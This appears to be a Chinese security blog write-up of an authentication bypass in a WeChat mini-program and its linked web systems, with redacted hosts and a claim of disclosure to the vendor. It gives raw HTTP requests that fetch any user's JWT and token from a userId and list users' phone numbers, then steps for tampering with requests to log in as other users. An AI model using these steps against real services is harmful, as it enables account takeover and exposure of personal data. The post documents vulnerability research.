免责声明
❝
由于传播、利用本公众号”隼目安全”所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号”隼目安全”及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉谢谢!
该漏洞已经向相关单位与平台进行报告,本文中图片、内容等均已脱敏!!!
微信搜索小程序xxx
![图片[1]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-5a050b0f5a7d444374e4fd63c0c143f3.png)
搜索网站
http://xxxx.xxxx.com/login?backUrl=http://cloud.xxxx.com
![图片[2]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-6a2bc69dede6e41c4d8dcdef93f31f42.png)
注册/微信授权登录进入
![图片[3]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-c6d7687d9097d312b58608d3d57905ec.png)
小程序授权登录抓包获取userid
![图片[4]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-b1ebb9d887e1b5214f1022e50957187f.png)
调用请求payload
POST /imnet/api/getJwtTokenAndToken h2
host: xxxxxx.xxxx.com
content-length: 14
reqable-id: reqable-id-6245450e-dfed-4467-9111-adf9aeb6ebc6
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c11)XWEB/11581
accept: application/json
accept-encoding: gzip, deflate, br
content-type: application/x-www-form-urlencoded
cookie: JSESSIONID=A013BBDC80F295FFEACBEC6434ADC3C1
x-requested-with: XMLHttpRequest
token:xxxxxxxxxx
origin: https://xxxxxx.xxxx.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://xxxxxx.xxxx.com/appPreEntry?token=xxxxxxxxxxxxxxxxxxx&userId=xxxxxxx&procedureLetter=WEIXIN&version=1.0
accept-language: zh-CN,zh;q=0.9
userId=xxxxxxx
即可获取其他用户的jwt令牌与token
![图片[5]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-0387bf0d9e33f20df4c18d92eb5943ce.png)
调用pyaload
GET /restaurant/wqbUser/pageList h2
host: xxxxxx.xxxx.com
reqable-id: reqable-id-607c2d5e-d427-47cc-b67f-ac10c97fab3a
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 MicroMessenger/7.0.20.xxxx(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090c11)XWEB/11581
accept: */*
accept-encoding: gzip, deflate, br
cookie: xxxxxxxxxxxxxxxxxxxxxxxxx
xweb_xhr: 1
token: E94F04932366FC3756B2319AB312134C 上个payload获取的token放在这里
content-type: application/json
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://xxxxxxxxxxxx.com/wx95aa572faff6320a/102/page-frame.html
accept-language: zh-CN,zh;q=0.9
调用pyaload获取用户信息和手机号
![图片[6]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-67866052d7f0fdbd7df7671597906d53.png)
登录后的网站后面有jwt令牌,修改jwt令牌并进行抓包
![图片[7]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-c3e1326a70dafc1a1b79c1f60fedca9e.png)
将请求包钟的phone改为改jwt令牌相同token下获取的手机号
![图片[8]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-852a47d1298f78867adce417eac719f5.png)
相应包为true即可放包
![图片[9]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-7db6397eedc9c77cefe70db144f793ab.png)
成功登录用户系统主页
选择一个系统进入并进行抓包
![图片[10]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-1d4fcf2cede49507b16bcb2a12cf65ec.png)
此处手机号依旧改为之前的手机号
![图片[11]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-08b1539ad63c485a3216a5cb19b265aa.png)
即可进入系统,其他官方系统也是一样的操作方式
![图片[12]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-7fc0bd23913ddc7bc8b25fc7daeff263.gif)
![图片[13]-【漏洞挖掘】记一次权限认证绕过-隼目安全](https://www.cn-fnst.top/wp-content/uploads/2025/01/frc-3b63b85b5e3e160ae5808ab2911bf896.png)
© 版权声明
暂无评论内容